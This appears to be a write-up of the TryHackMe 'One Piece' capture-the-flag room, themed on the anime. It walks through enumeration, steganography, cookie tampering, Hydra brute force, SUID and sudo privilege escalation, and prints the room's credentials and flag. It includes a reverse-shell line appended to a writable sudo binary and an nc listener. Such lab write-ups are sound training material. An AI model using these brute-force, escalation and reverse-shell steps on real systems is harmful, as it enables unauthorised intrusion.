TryHackMe — One Piece Room Writeup
Short summary of the post for previews and SEO.
🏴☠️ TryHackMe — One Piece Room Writeup
“I’m gonna be the Pirate King!” — Monkey D. Luffy
Room: One Piece
Platform: TryHackMe
Difficulty: Medium
Author: A One Piece fan, for One Piece fans
Table of Contents
- Reconnaissance
- FTP Enumeration — Zou Island (1st Road Poneglyph)
- Web Enumeration — The New World
- Finding the Log Pose
- Dressrosa — The Rabbit Hole
- Whole Cake Island — Big Mom (2nd Road Poneglyph)
- Random Island — Buggy’s Games
- Onigashima — Kaido (3rd Road Poneglyph)
- The Last Road Poneglyph — Hidden in Plain Sight
- Decoding the Poneglyphs — SSH Credentials
- Laugh Tale — Initial Access
- Privilege Escalation — Luffy vs Teach
- Root — The One Piece
- Summary
1. Reconnaissance
Starting with a full Nmap scan to discover open ports and running services:
1
nmap -A 10.49.138.101
Results:
| Port | Service | Version |
|---|---|---|
| 21/tcp | FTP | vsftpd 3.0.3 |
| 22/tcp | SSH | OpenSSH 7.6p1 Ubuntu |
| 80/tcp | HTTP | Apache httpd 2.4.29 |
Key finding: Anonymous FTP login is allowed, and there’s already a visible file welcome.txt in the FTP root.
2. FTP Enumeration — Zou Island (1st Road Poneglyph)
Logging into FTP anonymously:
1
2
3
ftp 10.49.138.101
# Username: anonymous
# Password: <blank>
Running ls -al (important! standard ls misses hidden files) revealed a hidden directory:
1
2
drwxr-xr-x 2 0 0 4096 Jul 26 2020 .the_whale_tree
-rw-r--r-- 1 0 0 187 Jul 26 2020 welcome.txt
In One Piece lore, the Whale Tree on Zou island hides the first Road Poneglyph. The room creator stayed true to the story!
Navigating into .the_whale_tree and listing contents:
1
2
ftp> cd .the_whale_tree
ftp> ls -al
Found two hidden files:
.road_poneglyph.jpeg.secret_room.txt
Downloaded both in binary mode to avoid corruption:
1
2
3
4
ftp> binary
ftp> get .secret_room.txt
ftp> get .road_poneglyph.jpeg
ftp> exit
Reading .secret_room.txt revealed a dialogue between Inuarashi, Nekomamushi, and Luffy about the Road Poneglyphs — and confirmed the tree name: the Whale Tree of Zou.
Next, inspecting the JPEG for steganography:
1
2
steghide extract -sf .road_poneglyph.jpeg
# Passphrase: <blank>
Success! Extracted a large encoded string — the 1st Road Poneglyph. Saved it for later decoding.
3. Web Enumeration — The New World
Opening http://10.49.138.101 revealed a page titled “New World”. Viewing the page source (Ctrl+U) uncovered a hidden HTML comment:
1
<!--J5VEKNCJKZEXEUSDJZEE2MC2M5KFGWJTJMYFMV2PNE2UMWLJGFBEUVKWNFGFKRJQKJLUS5SZJB...-->
This Base32-encoded string, when fully decoded through multiple layers, revealed a hint: there are 3472 possible locations for the Log Pose — meaning we needed a custom wordlist.
4. Finding the Log Pose
Searching GitHub for a repository called LogPose revealed a custom wordlist with exactly 3472 entries. Downloaded it and ran Gobuster:
1
gobuster dir -u http://10.49.138.101 -w LogPose.txt -x php,html,txt
Found the hidden path: /dr3ssr0s4.html — Dressrosa!
5. Dressrosa — The Rabbit Hole
Navigating to http://10.49.138.101/dr3ssr0s4.html showed an image called rabbit_hole.png with encoded strings — a deliberate troll by the room creator.
The real clue was hidden in the CSS file:
1
curl http://10.49.138.101/css/style.css
Found a secret image reference: ../king_kong_gun.jpg. Downloaded and inspected with exiftool:
1
2
wget http://10.49.138.101/king_kong_gun.jpg
exiftool king_kong_gun.jpg
The Comment metadata field revealed:
1
Doflamingo is /ko.jpg
Downloaded ko.jpg and ran strings on it:
1
strings ko.jpg | tail -n 20
Found the hidden message:
1
Congratulations, this is the Log Pose that should lead you to the next island: /wh0l3_c4k3.php
6. Whole Cake Island — Big Mom (2nd Road Poneglyph)
Navigating to http://10.49.138.101/wh0l3_c4k3.php presented a text input form. The hint said “Big Mom likes cakes” — but the real trick was in the browser cookies.
Opening DevTools → Storage → Cookies revealed:
| Name | Value |
|---|---|
| cookie | NoCakeForYou |
Changed the cookie value to CakeForYou and submitted the form:
1
2
3
curl -X POST http://10.49.138.101/wh0l3_c4k3.php \
-d "text_input=cake" \
--cookie "cookie=CakeForYou"
Success! Received the 2nd Road Poneglyph and a redirect to the next island: /r4nd0m.html.
7. Random Island — Buggy’s Games
/r4nd0m.html presented two mini-games offered by Buggy the Clown:
- Brick Breaker
- Brain Teaser
Checking the JavaScript source of brain_teaser.js:
1
curl http://10.49.138.101/buggy_games/brain_teaser.js
Found hidden inside the JS code:
1
document.getElementById('back').textContent = "Log Pose: /0n1g4sh1m4.php"
The Log Pose was hidden on the back face of the 3D cube — only visible by reading the source!
8. Onigashima — Kaido (3rd Road Poneglyph)
/0n1g4sh1m4.php presented two options: a login form and a file upload. The page hinted “Speaking about brute force, Kaido is unbeatable” — a bluff!
Downloaded kaido.jpeg and cracked its steghide passphrase using stegseek:
1
stegseek kaido.jpeg rockyou.txt
Cracked! Passphrase: imabeast — very on-theme for Kaido of the Beasts 😄
Extracted file contained:
1
Username: K1ng_0f_th3_B3@sts
Used Hydra to brute force the password against the login form:
1
2
hydra -l K1ng_0f_th3_B3@sts -P rockyou.txt 10.49.138.101 http-post-form \
"/0n1g4sh1m4.php:user=^USER^&password=^PASS^&submit_creds=Login:ERROR"
Successfully logged in and received the 3rd Road Poneglyph. Next destination: /r4nd0m.html again, then sailing on.
9. The Last Road Poneglyph — Hidden in Plain Sight
The page said the location of the 4th Poneglyph was “unspecified”. Navigating literally to:
1
http://10.49.138.101/unspecified
Found the 4th and final Road Poneglyph! The room creator hid it in plain sight by using the word “unspecified” as the actual path. 😂
10. Decoding the Poneglyphs — SSH Credentials
With all 4 Road Poneglyphs collected, concatenated them and decoded through 6 layers using CyberChef:
1
Base32 → Morse Code → Binary → Hex → Base58 → Base64
Final output — SSH credentials:
1
2
Username: M0nk3y_D_7uffy
Password: 1_w1ll_b3_th3_p1r@t3_k1ng!
11. Laugh Tale — Initial Access
1
ssh M0nk3y_D_7uffy@10.49.138.101
Successfully landed on Laugh-Tale! Reading laugh_tale.txt revealed that Marshall D. Teach (Blackbeard) was also on the island — setting up the final boss fight.
12. Privilege Escalation — Luffy vs Teach
Step 1: SUID Binary
Checking for SUID binaries:
1
find / -perm -4000 2>/dev/null
Found a suspicious binary that stood out immediately:
1
/usr/bin/gomugomunooo_king_kobraaa
Gum Gum King Cobra — one of Luffy’s finishing moves. Of course! 🐍
Running it opened a Python 3.6 interpreter owned by 7uffy_vs_T3@ch. Escalated to that user using:
1
/usr/bin/gomugomunooo_king_kobraaa -c 'import os; os.execl("/bin/sh","sh","-p")'
Now running as 7uffy_vs_T3@ch!
Step 2: Sudo Misconfiguration
Checking sudo permissions:
1
sudo -l
Output:
1
2
User 7uffy_vs_T3@ch may run the following commands on Laugh-Tale:
(ALL) /usr/local/bin/less
The file /usr/local/bin/less was world-writable (-rwxrwx-wx)! Injected a payload:
1
echo "/bin/bash -i >& /dev/tcp/YOUR_IP/1337 0>&1" >> /usr/local/bin/less
Set up a listener and executed:
1
2
3
nc -lvnp 1337
# then:
sudo /usr/local/bin/less
Alternatively, using the GTFOBins trick inside less:
1
2
3
sudo less /etc/profile
# then type inside less:
!/bin/bash
ROOT SHELL OBTAINED! 👑
13. Root — The One Piece
Finding the One Piece:
1
2
find / -name "*piece*" 2>/dev/null
cat /usr/share/mysterious/on3_p1ec3.txt
1
One Piece: S3cr3ts_0f_tH3_W0rlD_&_0f_Th3_P@st$
Just like in the anime — the One Piece was the secrets of the world and its past. The room creator stayed perfectly true to the lore. 😭🏴☠️
14. Summary
| Step | Action | Tool |
|---|---|---|
| Recon | Port scan | Nmap |
| FTP | Anonymous login, hidden files | FTP, steghide |
| Web | Hidden HTML comment | Browser DevTools |
| Log Pose | Custom directory brute force | Gobuster + LogPose.txt |
| Dressrosa | CSS → image → metadata | exiftool, strings |
| Whole Cake | Cookie manipulation | DevTools, curl |
| Buggy’s Island | JS source analysis | curl |
| Onigashima | Steghide crack + Hydra | stegseek, Hydra |
| 4th Poneglyph | Literal path /unspecified | Browser |
| Decode | 6-layer encoding chain | CyberChef |
| Privesc 1 | SUID Python binary | find, os.execl |
| Privesc 2 | Writable sudo binary | echo, nc |
| One Piece | Flag found in /usr/share/mysterious/ | find, cat |
Final Thoughts
This room was an absolute masterpiece for any One Piece fan. Every island, every character interaction, and every challenge was woven perfectly into the CTF mechanics. From the Whale Tree hiding the first Poneglyph to decoding through 6 layers of encoding to get Luffy’s SSH password — the attention to lore detail was incredible.
Favorite moment: The 4th Poneglyph being literally at /unspecified because the page said its location was “unspecified”. 😂
If you’re a One Piece fan who loves CTFs, this room is a must-play. Now go touch some grass and watch One Piece. 🏴☠️
Written by a proud new Pirate King 👑
“The One Piece is real!”
You can find me online at:
